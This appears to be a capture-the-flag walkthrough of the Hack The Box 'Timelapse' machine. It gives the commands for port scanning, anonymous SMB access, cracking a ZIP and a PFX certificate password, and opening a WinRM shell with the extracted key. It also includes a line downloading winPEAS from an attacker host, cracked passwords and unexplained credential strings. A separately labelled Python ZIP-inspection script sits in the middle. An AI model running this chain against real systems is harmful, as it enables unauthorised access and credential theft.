
HTB Timelapse Notes

Timelapse

About The Project

Timelapse HTB Machine

Steps

1. Nmap Scans:

nmap -p- 10.10.11.152
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5986/tcp  open  wsmans           syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49673/tcp open  unknown          syn-ack ttl 127
49674/tcp open  unknown          syn-ack ttl 127
49696/tcp open  unknown          syn-ack ttl 127
51231/tcp open  unknown          syn-ack ttl 127

nmap -sVC 10.10.11.152
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-06-13 15:03:29Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?      syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

2. SMB Enumeration:

smbclient -N -L 10.10.11.152
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share
Shares          Disk
SYSVOL          Disk      Logon server share

Investigating, we find several files on the Shares share:

smbclient \\\\10.10.11.152\\Shares
LAPS_Datasheet.docx               LAPS.x64.msi
LAPS_OperationsGuide.docx         winrm_backup.zip
LAPS_TechnicalSpecification.docx

winrm_backup.zip seems interesting, but it is password protected. The DOCX files contain documentation about how passwords are managed around the directory (LAPS).

3. Cracking the ZIP:

Let's try to crack the zip:

fcrackzip -D -u winrm_backup.zip -p /usr/share/wordlists/rockyou.txt
PASSWORD FOUND!!!!: pw == supremelegacy

The zip password was weak (supremelegacy). Inside we obtain legacyy_dev_auth.pfx.
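As an added check that is not part of the original notes: fcrackzip's -u brute force only applies to the legacy PKWARE ZipCrypto scheme, so a defender triaging a found archive like winrm_backup.zip wants to know whether its entries use ZipCrypto or WinZip AES. The script below reads that from the ZIP headers; the sample archive and the patched flag bit are constructed in the script, since the Python stdlib cannot write encrypted ZIPs.

```python
import io
import struct
import zipfile

def aes_strength(extra):
    """Return the key size from a WinZip AES (0x9901) extra record, else None."""
    pos = 0
    while pos + 4 <= len(extra):
        rec_id, size = struct.unpack_from("<HH", extra, pos)
        if rec_id == 0x9901 and size >= 5:
            # record data: vendor version(2), vendor id(2), strength(1), method(2)
            return {1: 128, 2: 192, 3: 256}.get(extra[pos + 8])
        pos += 4 + size
    return None

def inspect_zip_encryption(zip_bytes):
    """Map each entry to 'none', 'zipcrypto' or 'aes-<bits>'. Flag bit 0 marks an
    encrypted entry; method 99 plus a 0x9901 record means WinZip AES, else ZipCrypto."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.flag_bits & 0x1:
                report[info.filename] = "none"
            elif info.compress_type == 99:
                report[info.filename] = f"aes-{aes_strength(info.extra) or 'unknown'}"
            else:
                report[info.filename] = "zipcrypto"
    return report

def build_sample_zip(entries):  # constructed, unencrypted sample archive
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

def mark_zipcrypto(zip_bytes, name):
    """Set flag bit 0 in one entry's local and central headers so the constructed
    sample presents itself as ZipCrypto-protected (its data stays plaintext)."""
    data, target = bytearray(zip_bytes), name.encode()
    # (signature, flag offset, filename-length offset, filename offset)
    for sig, flag_off, fnlen_off, name_off in ((b"PK\x03\x04", 6, 26, 30), (b"PK\x01\x02", 8, 28, 46)):
        pos = data.find(sig)
        while pos >= 0:
            fnlen = struct.unpack_from("<H", data, pos + fnlen_off)[0]
            if data[pos + name_off:pos + name_off + fnlen] == target:
                flags = struct.unpack_from("<H", data, pos + flag_off)[0]
                struct.pack_into("<H", data, pos + flag_off, flags | 0x1)
            pos = data.find(sig, pos + 4)
    return bytes(data)
```

Run inspect_zip_encryption on the bytes of a real archive to see which entries a ZipCrypto-only cracker could even target.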

4. Cracking the pfx:

A quick Google search about extracting certificate keys from a pfx turns up https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file, but we need the pfx password first, so we try to crack it with john. Convert the file to a john hash:

pfx2john legacyy_dev_auth.pfx > pfx_john_legacy.hash
john -w=/usr/share/wordlists/rockyou.txt pfx_john_legacy.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:02:13 DONE (2022-06-13 04:00) 0.007506g/s 24256p/s 24256c/s 24256C/s thuglife03282006..thug209
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Found pfx password: thuglegacy

Now let's extract the key and cert:

Extract cert:

openssl pkcs12 -in legacyy_dev_auth.pfx -out cert.pem

Extract priv key:

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv.pem -nodes

After formatting the files correctly we can connect via WinRM using the certificate:

evil-winrm -S -k formated/key.key -c formated/cert.crt -i 10.10.11.152


USER FLAG OWNED

5. Privilege Escalation (System OWN):

Let's run winPEAS:

Invoke-WebRequest -Uri 10.10.14.20:8000/winPEASx64.exe -OutFile winpeas.exe

My pass is: E3R$Q62^12p7PLlC%KWaxuaV

pass: G!OSV[!-e[-w).,4rK6G,78/

License

Distributed under the MIT License. See LICENSE.txt for more information.


Contact

Pol Galvez - [email protected]
